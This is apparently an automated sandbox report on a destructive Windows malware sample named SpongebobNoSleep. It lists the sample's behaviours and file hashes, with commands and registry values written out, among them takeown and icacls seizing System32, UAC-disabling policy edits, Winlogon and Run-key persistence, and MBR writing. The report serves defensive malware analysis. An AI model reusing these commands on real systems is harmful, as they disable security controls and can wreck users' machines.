Malware Analysis Report

2024-11-16 12:23

Sample ID 240318-fg4qcshc9x
Target SpongebobNoSleep-main.zip
SHA256 886d6753cbc06147302e746e9f34c5daab793078cd868cc16891143eeb30af2a
Tags: discovery exploit bootkit evasion persistence ransomware trojan upx
Score: 10/10


Analysis Overview

Score: 10/10

SHA256

886d6753cbc06147302e746e9f34c5daab793078cd868cc16891143eeb30af2a

Threat Level: Known bad

The file SpongebobNoSleep-main.zip was found to be: Known bad.

Malicious Activity Summary

discovery exploit bootkit evasion persistence ransomware trojan upx

Modifies WinLogon for persistence

UAC bypass

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Possible privilege escalation attempt

Modifies file permissions

UPX packed file

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry key

Modifies Control Panel

Suspicious use of SetWindowsHookEx

Runs net.exe

Modifies Internet Explorer settings

System policy modification

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-18 04:51

Signatures

UPX packed file

Tags: upx

Unsigned PE


Analysis: behavioral15

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

Tags: exploit

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Modifies file permissions

Tags: discovery

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\LogonUI.exe | C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

N/A

Files

memory/2204-0-0x0000000000FA0000-0x0000000000FAE000-memory.dmp

memory/2204-1-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

memory/2204-2-0x000000001A7B0000-0x000000001A830000-memory.dmp

memory/2204-4-0x000007FEF59A0000-0x000007FEF638C000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

95s

Max time network

175s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

Tags: exploit

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe | N/A

Modifies file permissions

Tags: discovery

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network


Files

memory/4676-0-0x0000000000850000-0x000000000085E000-memory.dmp

memory/4676-1-0x00007FFBEDF90000-0x00007FFBEEA51000-memory.dmp

memory/4676-2-0x000000001B5A0000-0x000000001B5B0000-memory.dmp

memory/4676-3-0x00007FFBEDF90000-0x00007FFBEEA51000-memory.dmp

memory/4676-4-0x000000001B5A0000-0x000000001B5B0000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

154s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Signatures

N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.js

Network


Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

118s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.Designer.vbs"

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20231215-en

Max time kernel

112s

Max time network

145s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Properties\Resources.vbs"

Network


Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

176s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\TempPE\Properties.Resources.Designer.cs.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4048 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:8

Network


Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

Signatures

Modifies WinLogon for persistence

Tags: persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

UAC bypass

Tags: evasion trojan

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

Disables RegEdit via registry modification

Tags: evasion

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

Disables Task Manager via registry modification

Tags: evasion

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Writes to the Master Boot Record (MBR)

Tags: bootkit persistence

Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe | N/A

Sets desktop wallpaper using registry

Tags: ransomware

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" | C:\Windows\system32\reg.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A
File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A
File opened for modification | \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav | C:\Windows\system32\cmd.exe | N/A
File created | \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe | C:\Windows\system32\cmd.exe | N/A

Enumerates physical storage devices

Modifies Control Panel

Tags: evasion

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4516 wrote to memory of 4640 | N/A | C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe | C:\Windows\system32\wscript.exe
PID 4640 wrote to memory of 2028 | N/A | C:\Windows\system32\wscript.exe | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe
PID 4640 wrote to memory of 4732 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe
PID 4732 wrote to memory of 5116 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 4732 wrote to memory of 1100 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2220 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4408 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3880 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3560 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4820 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2008 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4368 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3432 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1360 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2872 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4896 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2304 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4992 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4012 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1260 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 3528 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4708 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 1908 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2504 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 2480 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe
PID 4732 wrote to memory of 4312 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe

System policy modification

Tags: evasion

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49DC.vbs //Nologo

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe

"C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\49CA.tmp\tools.cmd" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters


C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe

"C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe"

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe

"C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2b4 0x3f0

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49DC.vbs

MD5 b893c34dd666c3c4acef2e2974834a10
SHA1 2664e328e76c324fd53fb9f9cb64c24308472e82
SHA256 984a07d5e914ed0b2487b5f6035d6e8d97a40c23fa847d5fbf87209fee4c4bbc
SHA512 98a3413117e27c02c35322e17c83f529955b83e72f2af7caaaff53099b583cd241cec95e70c3c0d6d440cb22cf0109d4e46dfda09ef2480427e9a9ab7a4c866b

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU 5.txt

MD5 bb6d68d7181108015cd381c28360dfc4
SHA1 192c34b9cba6f9c4b742f2b70d9731b8ba2ac764
SHA256 aea8fb9235900760ac374c6a4a10fba62c2a0ef5bea2dd7ef4db70fe55e0b317
SHA512 e3d6bf8f6ae16daa235e2bc7ce64da5a76ff0155fa89942a4e9d3f10ce70229e081c5029a6b67702a6b14000f62e6c9188ba394ee7183d0667ddac9e0224f3f3

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe

MD5 32fcbf41f490eade2e84c151bb70ec1b
SHA1 37d04455c86f9d53459b0ff8aafa1b90d4b8057f
SHA256 a1731bbc326d3a5a36b4ecd00bb46424003f064a3a4a74daafde08dd790bd789
SHA512 9606eeec8a8b2db12add5c5217761f027eee71a75374a18c7aa7a32987d08e43f8b1b56f457a810c2e6d52df21d407c4f0def8c01ca20c55af63b94d38251814

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mbr.exe

MD5 33bd7d68378c2e3aa4e06a6a85879f63
SHA1 00914180e1add12a7f6d03de29c69ad6da67f081
SHA256 6e79302d7ae9cc69e4fd1ba77bd4315d5e09f7a173b55ba823d6069a587a2e05
SHA512 b100e43fb45a2c8b6d31dd92a8ae9d8efea88977a62118547b4609cc7fe0e42efc25dc043bac4b20f662fab044c0ba007b322c77e66f0c791cc906eafc72fb95

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\tools.cmd

MD5 397c1a185b596e4d6a4a36c4bdcbd3b2
SHA1 054819dae87cee9b1783b09940a52433b63f01ae
SHA256 56c7054c00a849648d3681d08536dc56c0fb637f1f1ec3f9e102eace0a796a9f
SHA512 c2a77479ca0aa945826dccea75d5a7224c85b7b415fda802301be8a2305197276a33c48f82717faddb2a0ac58300f5b849a8c0dffb5a4443663c3dfd951d4e5c

memory/2028-221-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\bg.bmp

MD5 ce45a70d3cc2941a147c09264fc1cda5
SHA1 44cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256 eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512 d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\gdifuncs.exe

MD5 e254e9598ee638c01e5ccc40e604938b
SHA1 541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
SHA256 4040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
SHA512 92f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\mainbgtheme.wav

MD5 45c0e7067f628a4529aa3783f64c64ac
SHA1 759d187ac48eb566f820952fd304411eefa34e5f
SHA256 f4e8bb2473968d21ca4e49135d198b54f648c10ba86b71432206a5eb847e901e
SHA512 02168fda58fa80681bf96d72154c668d9e8a0b6caf2f209b900a654b7899eb0450e1181b2e7a65c33f8b0b01fcca9a6e8ce48713dd5ba473cd897293bd37ce63

C:\Users\Admin\AppData\Local\Temp\49CA.tmp\MainWindow.exe

MD5 7c92316762d584133b9cabf31ab6709b
SHA1 7ad040508cef1c0fa5edf45812b7b9cd16259474
SHA256 01995c3715c30c0c292752448516b94485db51035c3a4f86eb18c147f10b6298
SHA512 f9fc7600c30cb11079185841fb15ee3ba5c33fff13979d5e69b2bae5723a0404177195d2e0bd28142356ff9b293850880b28322b2ce1ff9fe35e8961bb3f7be1

memory/4892-236-0x0000000000B60000-0x0000000000B82000-memory.dmp

memory/4892-240-0x0000000072EA0000-0x0000000073650000-memory.dmp

memory/4892-241-0x0000000005AD0000-0x0000000006074000-memory.dmp

memory/4892-242-0x00000000055C0000-0x0000000005652000-memory.dmp

memory/4892-243-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-244-0x0000000005A30000-0x0000000005A3A000-memory.dmp

memory/4892-245-0x0000000003090000-0x00000000030A0000-memory.dmp

C:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav

MD5 fe19696f3471d2061a753f8fda76705d
SHA1 eef7f784b9dfaa92b176e044cea93436628021ba
SHA256 36d8cc91e7a9f7ad912efbf35454dfbb4a32a3e3d93a729c9a977b0fe1eb7fac
SHA512 228fea13f5b3e00f9ec4e48c6c01db5c1cc26021131520e593beded7cc40fcc84725c483aa68403c482e8aba287a00f4f505ca9d17ad7244d1d381a7873c4447

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_CE956E1FF8664E8C802A091BF3172C51.dat

MD5 064efbfcee2d19aa0c915ecb6fdf7c70
SHA1 15c03e83a9f15fd10d8d33b5b7806444838cbafc
SHA256 a90ef3274073451861a166ca1a172a8fdeb6e7ea4d493ffe2e628dc4be481d71
SHA512 5194080b4df0f06567ec04300290109731e3b4537ba8329d58578af2d2b840148a95440c6d18b6189f61b08b8d68427b43045260ed2e85baa008123db6a8c1c9

memory/4892-249-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-250-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-251-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-258-0x0000000072EA0000-0x0000000073650000-memory.dmp

memory/4892-263-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-266-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-271-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-274-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-279-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-284-0x0000000003090000-0x00000000030A0000-memory.dmp

memory/4892-287-0x0000000003090000-0x00000000030A0000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:54

Platform

win7-20231129-en

Max time kernel

7s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" C:\Windows\SysWOW64\reg.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" C:\Windows\SysWOW64\reg.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\previous versions\HorrorBob2.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3068 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
